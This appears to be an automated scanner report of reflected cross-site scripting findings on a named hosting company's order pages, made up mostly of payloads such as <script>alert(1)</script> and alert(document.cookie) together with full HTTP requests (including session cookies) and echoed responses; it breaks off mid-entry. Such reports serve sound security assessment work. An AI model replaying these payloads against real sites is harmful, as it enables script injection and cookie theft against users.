This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js443f0<script>alert(1)</script>3b0580f231a HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:24:01 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb65"><script>alert(1)</script>2674d2a482f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js8eb65"><script>alert(1)</script>2674d2a482f HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:24:00 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js8eb65"><script>alert(1)</script>2674d2a482f is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
1.19. https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 3bd25</title><script>alert(1)</script>542ceabf169 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?3bd25</title><script>alert(1)</script>542ceabf169=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:48 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19848
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?3bd25</title><script>alert(1)</script>542ceabf169=1 on Arvixe </title> ...[SNIP]...
1.20. https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47641<script>alert(1)</script>a598d0cfb6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?47641<script>alert(1)</script>a598d0cfb6c=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:47 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.21. https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5dbb"><script>alert(1)</script>305a0949b0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?c5dbb"><script>alert(1)</script>305a0949b0a=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:47 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19830
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?c5dbb"><script>alert(1)</script>305a0949b0a=1 is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 715dc"><script>alert(1)</script>58250051148 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C715dc"><script>alert(1)</script>58250051148/css/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3C715dc"><script>alert(1)</script>58250051148/css/alert.css is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload ca73f</title><script>alert(1)</script>7d7e0abe5ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3Cca73f</title><script>alert(1)</script>7d7e0abe5ea/css/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:33 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3Cca73f</title><script>alert(1)</script>7d7e0abe5ea/css/alert.css on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4e672<script>alert(1)</script>44662864af0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C4e672<script>alert(1)</script>44662864af0/css/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:32 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e7395<script>alert(1)</script>3695277093c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/csse7395<script>alert(1)</script>3695277093c/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1168e</title><script>alert(1)</script>5dacf1d7d73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/css1168e</title><script>alert(1)</script>5dacf1d7d73/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:37 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3C/css1168e</title><script>alert(1)</script>5dacf1d7d73/alert.css on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e012"><script>alert(1)</script>ffd8306cf28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/css4e012"><script>alert(1)</script>ffd8306cf28/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3C/css4e012"><script>alert(1)</script>ffd8306cf28/alert.css is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6665e"><script>alert(1)</script>a1594e90dce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/css/alert.css6665e"><script>alert(1)</script>a1594e90dce HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3C/css/alert.css6665e"><script>alert(1)</script>a1594e90dce is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3e51<script>alert(1)</script>7856fe90ced was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/css/alert.cssd3e51<script>alert(1)</script>7856fe90ced HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d5405</title><script>alert(1)</script>151528acca3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/css/alert.cssd5405</title><script>alert(1)</script>151528acca3 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3C/css/alert.cssd5405</title><script>alert(1)</script>151528acca3 on Arvixe </title> ...[SNIP]...
1.31. https://www.arvixe.com/order.phpd754c%3C/css/alert.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.arvixe.com
Path:
/order.phpd754c%3C/css/alert.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4820"><script>alert(1)</script>26862fb13a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/css/alert.css?e4820"><script>alert(1)</script>26862fb13a1=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:25 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3C/css/alert.css?e4820"><script>alert(1)</script>26862fb13a1=1 is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
1.32. https://www.arvixe.com/order.phpd754c%3C/css/alert.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.arvixe.com
Path:
/order.phpd754c%3C/css/alert.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18d71<script>alert(1)</script>1976ee1ae50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/css/alert.css?18d71<script>alert(1)</script>1976ee1ae50=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:26 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.33. https://www.arvixe.com/order.phpd754c%3C/css/alert.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.arvixe.com
Path:
/order.phpd754c%3C/css/alert.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload d78b0</title><script>alert(1)</script>662b60c430c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
